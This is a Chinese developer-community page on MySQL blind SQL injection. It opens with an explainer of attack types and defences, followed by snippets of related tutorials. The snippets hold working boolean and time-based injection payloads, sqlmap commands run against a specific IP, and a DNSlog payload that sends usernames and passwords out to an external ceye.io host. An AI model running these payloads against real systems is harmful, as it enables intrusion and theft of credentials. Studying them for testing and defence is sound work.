开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

mysql盲注语句

基础概念

MySQL盲注（Blind SQL Injection）是一种SQL注入攻击方式，攻击者通过构造特殊的SQL查询语句，利用应用程序对数据库的查询响应，逐步推断出数据库中的敏感信息。与传统的SQL注入不同，盲注攻击不会直接返回查询结果，而是通过判断查询响应的时间、返回的数据量或者数据的某些特征来获取信息。

相关优势

隐蔽性：盲注攻击通常不会在应用程序的响应中直接暴露数据，因此更难被检测。
信息收集：攻击者可以通过盲注逐步收集数据库中的敏感信息，如表名、列名、数据内容等。

类型

布尔盲注（Boolean-Based Blind Injection）：攻击者通过构造SQL语句，使查询结果为真或假，然后根据应用程序的响应来判断。
时间盲注（Time-Based Blind Injection）：攻击者通过构造SQL语句，使查询结果执行时间变长或变短，然后根据响应时间来判断。
基于错误信息的盲注（Error-Based Blind Injection）：虽然不是严格意义上的盲注，但攻击者可以通过构造SQL语句引发数据库错误，从而获取信息。

应用场景

盲注攻击通常发生在应用程序对用户输入没有进行充分过滤和验证的情况下，特别是在以下场景：

用户输入被直接拼接到SQL查询语句中。
应用程序对数据库查询结果的处理方式存在漏洞。

问题与解决方法

为什么会这样？

盲注攻击发生的原因通常是应用程序没有对用户输入进行充分的过滤和验证，导致恶意SQL语句能够被执行。

原因是什么？

输入验证不足：应用程序没有对用户输入进行严格的验证和过滤。
SQL语句拼接：应用程序直接将用户输入拼接到SQL查询语句中，没有使用参数化查询或其他安全措施。

如何解决这些问题？

使用参数化查询：参数化查询可以有效防止SQL注入攻击，因为它将用户输入视为参数而不是SQL代码的一部分。
使用参数化查询：参数化查询可以有效防止SQL注入攻击，因为它将用户输入视为参数而不是SQL代码的一部分。
输入验证和过滤：对用户输入进行严格的验证和过滤，确保输入的数据符合预期的格式和类型。
输入验证和过滤：对用户输入进行严格的验证和过滤，确保输入的数据符合预期的格式和类型。
最小权限原则：数据库连接应使用最小权限的用户，避免攻击者通过注入获取敏感数据或执行危险操作。
使用ORM工具：使用对象关系映射（ORM）工具如SQLAlchemy，可以减少直接编写SQL语句的机会，从而降低SQL注入的风险。
使用ORM工具：使用对象关系映射（ORM）工具如SQLAlchemy，可以减少直接编写SQL语句的机会，从而降低SQL注入的风险。

参考链接

通过以上措施，可以有效防止MySQL盲注攻击，保护应用程序和数据库的安全。

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

MySQL手注之布尔型盲注详解

saulGoodman 一个专注于红队攻防研究的公众号关注 MySQL手注之布尔型盲注详解布尔型盲注简介基于布尔型SQL盲注即在SQL注入过程中，应用程序仅仅返回True（页面）和False（页面...MySQL盲注常用函数 length() 返回字符串的长度，例如可以返回数据库名字的长度 substr() ⽤来截取字符串 ascii() 返回字符的ascii码 sleep(n) 将程序挂起⼀段时间...，n为n秒 if(expr1,expr2,expr3) 判断语句如果第⼀个语句正确就执⾏第⼆个语句如果错误执⾏第三个语句盲注流程 1、判断是否存在注入，是字符型还是数字型注入注入点原查询代码： $...getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; 判断注入：注入语句： 1' and 1=1 # 带入查询的语句...： $getid = "SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1 #';"; 注入语句： 1' and

10.8K2 1

sql盲注

文章源自【字节脉搏社区】-字节脉搏实验室作者-墨子辰扫描下方二维码进入社区：盲注是注入的一种，指的是在不知道数据库返回值的情况下对数据中的内容进行猜测，实施SQL注入。...盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。本次主要讲解的是基于布尔的盲注。...第二个是101 e 第三个是 99 c 第四个是117 u 第五个是114 r 第六个是105 i 第七个是116 t 第八个是121 y 可以得到数据库名字为：security 接下来头疼的爆数据表，盲注果然是很枯燥的事情...select ascii(substr((select password from users limit 0,1),1,1)))=68--+ 第一个密码：68,117,109,98 =>Dumb 注：

8831 0

1.3.1-SQL注入-SQL盲注-布尔盲注

SQL盲注-布尔盲注 01布尔盲注原理 $id=$_GET['id']; $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1 "; $result=mysql_query...($sql); $row=mysql_fetch_array($result); if($row) { echo "Right"; } else { echo "Wrong"; } 代码存在...，这既是布尔盲注！...version()),1)=5–+ 2.想办法构造语句，判断数据库中内容的值 02布尔盲注方法构造逻辑判断语句，判断信息的真假，取出所有的真值，实现SQL注入 left() left(database...ord() ord(mid((select user()),1,1))=114 mid() mid(a,b,c)从位置b开始，截取a字符串的c位ord()函数痛ascii(),将字符串转为ascii值 MySql

5714 0

1.3.3-SQL注入-SQL盲注-Dnslog盲注

需要目标机器时windows系统 DnsLog盲注 DnsLog盲注原理 Dnslog平台：http://ceye.io/ http://ceye.io/profile curl mzq83x.ceye.io...curl `whoami`.mzq83x.ceye.io DnsLog盲注方法核心语法： SELECT LOAD_FILE(CONCAT('\\\\',(select database(...)),'.mysql.r5ourp.ceye.io\\abc')); sql语句不能含有特殊符号查表 ?...'\\\\',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.mysql.r5oup.ceye.io...id=1' and LOAD_FILE(CONCAT('\\\\',(select concat(username,password) from security.users limit 0,1),'.mysql.r5ourp.ceye.io

5514 0

一文搞定MySQL盲注

目前的CTF中MySQL的盲注依然是热点之一，然而盲注又被分成Like盲注、正则盲注、异或盲注等等太多类型，让新入门的萌新十分摸不到头脑。...本文希望以言简意赅的语言帮助刚入门WEB CTF的选手们快速“拿捏”MySQL盲注。...目前CTF中十有八九是MySQL，所以本文也就全部讲MySQL了。 0x01 盲注介绍▸ 什么是盲注？...0x02 盲注怎么注▸ 盲注的步骤▸ 前面一直是以抽象的中文来表示盲注的操作，这里我们使用SQL语句进行更详细的说明。...我们注意到，它会根据MySQL的query是否出错来选择是否输出ERROR，这其实就是布尔回显，因此报错盲注依然是布尔盲注的一种，但是他又和传统布尔盲注有显著的不同。

2K4 0

1.3.2-SQL注入-SQL盲注-时间盲注

时间盲注时间盲注原理时间盲注方法 http://localhost:90/Less-10/?...information_schema.tables where table_schema=database() limit 0,1),1)='r',0,sleep(3))--+ 时间注入脚本 links 时间盲注

3981 0

mysql高级注入4--盲注1

所谓盲注就是在正常页面没有输入点，或者无法影响页面输出的内容~ 然后我们无法借助页面来返回数据库中我们想要注出的数据，这时候就要构造sql语句让它报错，或者进行一系列的判断。...这一篇讲的基于布尔的盲注。科普文，给学弟妹的...大牛绕过绕过... 一、字符串返回字符函数 ? 不得不提的是ord函数和ascii函数的用法一样，假如str为空字符串，则返回值为 0 。...mysql中的start是从1开始的查看我当前的数据库是security ? 截取第一个字符串 ? 第二个 ? 2、mid()函数 mid()函数此函数为截取字符串一部分。...所谓的盲注就是没有输出点。就是你和数据库产生了交互，但是在页面上去没有显示数据库的内容。具体可以参考sqli labs 基础练习5~ ?...但是如果是传参的语句呢？那么我们就没有办法像mysql客户端一样的回显了…不然怎么叫盲注。输入：http://localhost/sqli-labs/Less-5/?

7436 0

基于 MySQL 布尔值的 SQL 盲注

通常在 Blind SQLi 中，您无法真正看到您输入的查询的输出。在这种情况下，验证漏洞的唯一方法是查看网站是否成功/部分加载。

1.2K3 1

基于时间的盲注

01 盲注简介盲注就是在sql注入过程中，sql语句执行的选择后，选择的数据不能回显到前端页面。此时，我们需要利用一些方法进行判断或者尝试，这个过程称之为盲注。...对于基于布尔的盲注来说，我们可以构造一条注入语句来测试我们输入的布尔表达式，而这布尔表达式结果的真假，决定了每次页面有不同的反应。...对于基于时间的盲注来说，我们构造的语句中，包含了能否影响系统运行时间的函数，根据每次页面返回的时间，判断注入的语句是否被成功执行。...sleep()或benchmark()等函数让mysql执行时间变长并结合判断条件语句if(expr1,expr2,expr3)，然后通过页面的响应时间长短来判断语句返回的值是TRUE还是False，从而猜解一些未知的字段...测试过程：首先对name字段进行加锁，返回结果为1且时间为0证明加锁成功；图片建立另一个mysql连接，对同样的字段进行加锁，返回结果为0且时间是自定义的5，证明加锁失败；图片利用上面的基础理论加上时间盲注原理

7081 0

(SQL盲注)FinalSQL

欢迎关注我的微信公众号《壳中之魂》环境：BUUCTF在线评测 (buuoj.cn) 和之前的靶机差不多，也是一个登录框，但是多了几个按钮，标出来的局子也提醒了是通过sql盲注 [fcc10e3cd3151abb347dcb726eb874b2...可以看到过滤了括号，所以报错注入派不上用场 [fc740f55a0dc49e17af72967275915bc.jpeg] 但是可以注入的点不止这一个，点击主页的按钮，可以发现这里有个数字型注入，可以尝试盲注...id=elt(length(database())>1,6) [3b9ac7beb0d9380c4ab53e01552d14e1.jpeg] 确定好可以使用elt函数进行盲注后，接下来就进入盲注阶段由于此注入点过滤掉了空格...，所以我采用()来绕过过滤，使用()绕过过滤有一个很大的问题就是会让语句很乱，所以我就现在本地，分段测试语句，确定语句可用后再在靶机上运行在写脚本之前要先获取盲注的的判断规则，首先先确定语句正确和语句错误的区别

1.6K2 0

SQL注入-报错盲注

我们这期的主题报错盲注，我们就得用SQLMAP进行报错盲注的漏洞利用原文是带图的，要看有图的划到最下方有我博客链接对站点http://219.153.49.228:41592/new_list.php...id=1" --dbs 查找数据库选择stormgroup，因为其他表都是MySQL自带的 sqlmap.py -u http://219.153.49.228:41592/new_list.php...name,password,status" --dump 查出用户名为mozhe ，password为3c48eb99af674cdec2686f9c264211a3 md5解密，即成功的完成了一次报错盲注

7271 0

Microsoft SQL Server手注之布尔型盲注

判断是否存在注⼊ ' and 1=1 and 1=2 猜测数据库名先猜dbid是否存在： http://192.168.159.135:8080/get.aspx?...上面的这条语句的意思是查询 dbid=5 是否存在，最后那个=1就是是否存在的意思！存在说明返回正常！因为我数据库新建了两个：test（dbid5）、saulgoodman（dbid6） ?...dbid=5 and len(name)=4 这条语句的意思是查询 dbid=5 的这个数据库名的长度是否=4，返回正常说明它的长度=4！...dbid=6 and len(name)=11 这条语句的意思是查询 dbid=6 的这个数据库名的长度是否=11，返回正常说明它的长度=11！以此类推查询多个数据库名的长度！...因为我们知道了数据库名是test，第一个表名是 users，然后我们就可以使用下面的语句来查询第二个表名的字符(表名是info)：猜解第一个字符：i and (select count(*) from

4K2 0

盲注基本原理

最近找到一个带有注入的美国网站，发现是盲注，简单讲讲盲注的原理。 1.xxx.com/index.php?...ID=79' order by 4--+ 返回正常，表明当前表中有4个字段 4.查看返回信息输入： ID=79' select 1,2,3,4 --+ 尝试了很多次都不会显示任何信息，于是尝试盲注...table_name from information_schema.tables where table_schema=database()),1,1))>0--+ 这个payload不好直观理解，我们到本地mysql

8052 0

sql注入盲注高级技巧

sql注入盲注高级技巧对于sql盲注，常用的方法应该是二分法，如果是windows平台的话dnslog会是一种奇招，对于个人对盲注的理解，猜解需要大量时间和过多的经验，那么有没有一种比较不错的方式来进行盲注来达到快速又流程话的工作呢...选择sqlinjection（Blind）也就是盲注先从简单开始搞开局burp抓包判断有多少列. 猜解SQL查询语句中的字段数这个就很简单了由于是数字型注入我们就可以用简单的 ? ?...了那么现在我们就开始都用123456开始搞事情盲注需要了解的语法函数有几个很关键 length(str) 返回字符串str的长度，以字节为单位。...多个表就多个标记你懂的这样的盲注速度真的是节约太多时间还有可以用时间注入的方法进行盲注 if(length(database())=1,sleep(5),1) if(ascii(substr(database...，盲注的注入点查找要了解，通过构造语句来进行爆破测试，GET到关键的参数，设置好标记就能轻松blind了出来实战的话很多项目waf会把我们干掉那时候我们就需要把爆破速度调整分布式分小段爆+代理池的方法或许有点效果

1.6K3 0

SQL盲注学习笔记

什么是SQL盲注在网站中没有直接回显，没有输出结果，所以得一个一个的猜解长度、字符，通过数据库查询的True和false结果来判断，一般为布尔注入和时间注入，这篇主要记录时间注入，总结一下就是，当查询返回的结果为...1(True)时，通过sleep()来使数据库休息几秒，当访问的时候时间过长就说明该结果是正确的思路流程和一般的sql注入思路差不多，只是盲注更有技巧也更有难度正常的思路都是：数据库->表名->...($host, $user, $pass) or die("Unable to connect"); #连接数据库 mysql_select_db($db) or die("Unable to select...，输出点不会产生任何漏洞，写什么就输出什么，所以得用盲注来猜解把sql语句单独提出来 $sql="insert into client_ip (ip) values ('$ip')"; 这里可以构造注入语句为...# 语句 127.0.0.1')# #这是语句还是正常的 insert into client_ip (ip) values ('127.0.0.1')#) 因为过滤了逗号的原因，所以得换个方式构造盲注语句

4322 0

sql盲注的学习

这几天在学习sql注入的有关内容，今天记录一下我认为比较重要的部分，即sql盲注，我一开始学习的时候看到了好多的函数，看着看着就弄混了，相信不少新入门的师傅也有类似的困惑，经过多番心理斗争，我终于决定将这部分知识好整理一下...盲注类型基于布尔的盲注特征被注入的页面没有sql语句执行错误的显示，页面只有正常返回和不正常返回两种状态示例这里我拿sqli-labs的less8作为布尔型盲注的例子我们可以看到这个页面正常会返回...You are in...........而不正常的时候会无任何返回，这就很符合布尔盲注的特征正常返回： ?...剩下的表名和字段将脚本稍作修改即可猜解出来，篇幅原因不再重复操作基于报错的盲注(floor报错注入) 原理该类型的注入利用了mysql的8652号BUG(官方链接:https://bugs.mysql.com...想注出全部表名修改limit参数即可列名和数据同理修改查询语句就可以了。

7913 0

Microsoft SQL Server手注之延时型时间盲注

延迟注入简介延时函数 WAITFOR DELAY WAITFOR是SQL Server中Transact-SQL提供的⼀个流程控制语句。它的作⽤就是等待特定时间，然后继续执⾏后续的语句。...如果将该语句成功注⼊后，会造成数据库返回记录和 Web请求也会响应延迟特定的时间。由于该语句不涉及条件判断等情况，所以容易注⼊成功。...根据Web请求是否有延迟，渗透测试⼈员就可以判断⽹站是否存在注⼊漏洞。同时，由于该语句并不返回特定内容，所以它也是盲注的重要检测⽅法。...这条语句的意思呢是判断dibd=6的数据库是否存在！如果存在那么就延迟3秒返回！...所以我就能用上面的语句来判断dbid5的长度是否为5，如果为5那么就延迟3秒返回！

9.3K4 1

高级盲注—floor，rand，group by报错注入

where table_schema=database() and table_name='users' limit 0,1),0x7e,floor(rand(0)*2)) -- 爆列名时存在一个问题，我的MYSQL...You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version...我们分析一下，emmmmmm...在MYSQL命令行执行 select 1,2,min(@a:=1) from information_schema.tables group by concat(0x7e...我们再插入一条数据，再执行语句说明我们只要查询的数据超过2条必定报错！！！！...这三条数据的查询floor(rand(0)*2)一共被执行了5次，所以也就是为什么3条及其以上数据存在时，语句才会报错了！

1.8K10 0

布尔型盲注的PY交易

sqlmap根本法利用这个漏洞，但返回的数据包中实打实出现我数据库语句，所以我把返回的数据库语句拿出来，开始了一点点的构造进程。 ?...但返回的内容需要进行闭合而且返回内容不可以利用，所以可以排除报错等类型注入形式，可以探测的注入类型就仅剩下两种了：时间型盲注，布尔型盲注直接在目标后加入测试语句。...构造数据库语句： %’){测试语句}AND(c. full_name like ‘%test 返回成功，实现语句闭合（此外利用了数据库模糊查询like %%）,在测试过程中发现存在过滤，单独%无法通过，...空格无法通过，系统会返回404，针对之前爆出的数据库语句，利用%25和%20绕过对对单独%和空格的过滤构造出以上的数据库语句完成语句的闭合，成功返回200，确认可以返回正常数据包，并可以根据数据库语句的正确来进行布尔型盲注测试...，确认数据库名称三、工具思路 3.1 Post数据包利用利用python的数据包发送来批量测试目标内容和时间型盲注不同，布尔型盲注要根据返回数据包的不同来确认问题 %0a(ascii(substr

5203 0

基于时间的盲注python脚本

0x001 时间盲注简介时间盲注就是在页面进行SQL注入并执行后，前端页面无法回显注入的信息。...此时，我们可以利用sleep()函数来控制延迟页面返回结果的时间，进而判断注入的SQL语句是否正确，这个过程称之为时间盲注。...0x002 漏洞测试代码以下为本次实验测试的基于时间的数字型盲注漏洞代码，可以部署到本地进行配合脚本测试验证。 0x003 时间盲注之获取表名长度 ---- 1....第3个表': 5, '第4个表': 5} [+] 第5个表长度为: 5 {'第1个表': 4, '第2个表': 4, '第3个表': 5, '第4个表': 5, '第5个表': 5} 0x004 时间盲注之获取表名

1.7K8 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭